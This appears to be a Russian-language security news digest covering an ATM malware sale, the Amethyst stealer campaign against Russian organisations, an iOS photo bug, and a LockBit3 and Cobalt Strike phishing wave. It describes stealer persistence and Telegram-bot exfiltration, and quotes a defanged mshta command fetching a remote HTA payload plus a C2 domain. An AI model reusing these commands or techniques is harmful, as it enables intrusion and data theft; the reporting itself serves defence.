S.E.Book

В киберподполье набирает популярность нацеленный на банкоматы в Европе новый штамм вредоносного ПО под названием EU ATM Malware с заявленной беспрецедентной эффективностью в 99%.

Согласно утверждениям селлера, EU ATM Malware способен расчехлить практически любой европейский банкомат и до 60% устройств по всему миру, производимых Diebold Nixdorf, Hyosung, Oki, Bank of America, NCR, GRG, Hitachi и др.

Заявленные экономические ТТХ вредоноса гарантируют покупателю до 30 000 долларов за банкомат, при этом модностью автоматизировано, обеспечивая развертывание и эксплуатацию. Но также имеет и ручной режим работы.

Селлер предлагает гибкую систему оплаты и готов предоставить ежемесячную подписку, демоверсию полезной нагрузки на срок до трех дней, а также первоначальный взнос с выделением доли прибыли от успешных операций.

Насколько EU ATM Malware соответствует заявленным характеристикам и станет ли реальной угрозой банковского сектора в Европе пока не ясно, но будем посмотреть.

Ресерчеры BI.ZONE сообщают об активности Sapphire Werewolf, которая модифицировала опенсорс-стилер для проведения новых атак в целях кибершпионажа.

Начиная с марта 2024 года Sapphire Werewolf реализовала уже более 300 атак на российские организации в сфере образования, промышленности, ИТ, ВПК и космоса с использованием стилера Amethyst, который злоумышленники разработали на основе программы с открытым исходным кодом - SapphireStealer.

Атакующие распространяли вредоносное ПО с помощью фишинговых электронных писем со ссылками в формате t[.]ly под видом постановления о возбуждении исполнительного производства, информационного бюллетеня ЦИК, а также указа Президента РФ.

После открытия вредоносного файла осуществляется создание папки %AppData%\Microsoft\EdgeUpdate, из Resources.MicrosoftEdgeUpdate в нее записывается MicrosoftEdgeUpdate.exe. Попутно производится запись отвлекающего документа в текущую директорию и его открытие.

Для обеспечения персистентности в системе жертвы осуществляется создание задачи в планировщике с помощью встроенной в исполняемый файл библиотеки FunnyCat.Microsoft.Win32.TaskScheduler.dll.

Имя, описание и путь к исполняемому файлу в задаче маскируются под легитимную задачу MicrosoftEdgeUpdateTaskMachineCore.

После закрепления осуществляется запись стилера Amethyst (в файл VPN.exe во временной папке данных) и его запуск, сопровождающийся изменением зоны безопасности исполняемого потока на MyComputer, а также созданием асинхронной задачи, которая впоследствии отправит собранные файлы на С2.

Собранные файлы сохраняются в папку, названием которой является строка, сгенерированная с помощью UUID. Папка находится в каталоге с временными файлами.

Стиллер собирает файлы конфигурации мессенджера Telegram, файлы с различными расширениями и с внешних носителей, данные из браузеров (Chrome, Opera, Yandex, Brave, Edge и др.), а также журналы использования PowerShell и конфиги FileZilla и SSH.

Собранные материалы помещаются в архив и отправляются на С2, а в последних версиях при создании архива используется пароль и добавляется комментарий с данными по хосту.

Роль командного сервера для отправки архива выполнял бот в Telegram, токен которого, как и идентификатор пользователя, находился в ПО.

При этом злоумышленники в код разных версий ВПО указывали не один, а сразу несколько токенов и идентификаторов пользователя. Если главный бот или основной клиент были недоступны, вредоносное ПО обращалось к другим.

IOCs и рекомендации по обнаружению вредоносной активности - в отчете.

После шквала мемов, сопровождающих скандал по поводу конфиденциальности пользовательских данных в яблочных девайсах, Apple решила экстренно выпустить iOS 17.5.1.

Обнаруженный баг был вызван тем, что фотографии удалялись из приложения Photos, но не из файлового менеджера, а после обновления до iOS 17.5 удаленные таким образом фото вновь появились в ленте медиатеки.

Похоже, что баг был связан с процессом переиндексации после обновления iOS, при котором система по ошибке пересохранила фотографии из файлового менеджера в приложении Photos.

Тем не менее, англоязычные владельцы сразу же преуспели в конспирологию и начали муссировать слухи про негласные договоренности Apple со спецслужбами по поводу "mirroring" данных и изображений.

Конечно, никаких доказательств никто так и нашел, но неприятный осадочек остался.

͏Исследователи F.A.C.C.T. сообщили о новой волне атак с вредоносными рассылками со стороны Werewolves, специализирующейся на вымогательстве с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе утекшего билдера.

Банда практикует технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп, сумма которого обычно составляет 130 000 - 1 000 000$.

Ранее в апреле этого года вымогатели засветили, осуществляя массовые рассылки на тему весеннего призыва и досудебных претензий.

Целями новых атак стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации.

Злоумышленники создали фейковый сайт крупного российского производителя спецтехники, полностью эмулировав содержимое оригинального портала с помощью HTTrack Website Copier. Отличие заключалось лишь в доменном имени: у оригинального - com, у фейка - ru.

Письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.

После того, как жертва открывает вложенный документ «Рекламация.doc» загружается RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.

На устройство жертвы доставляется HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.

HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager, который загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.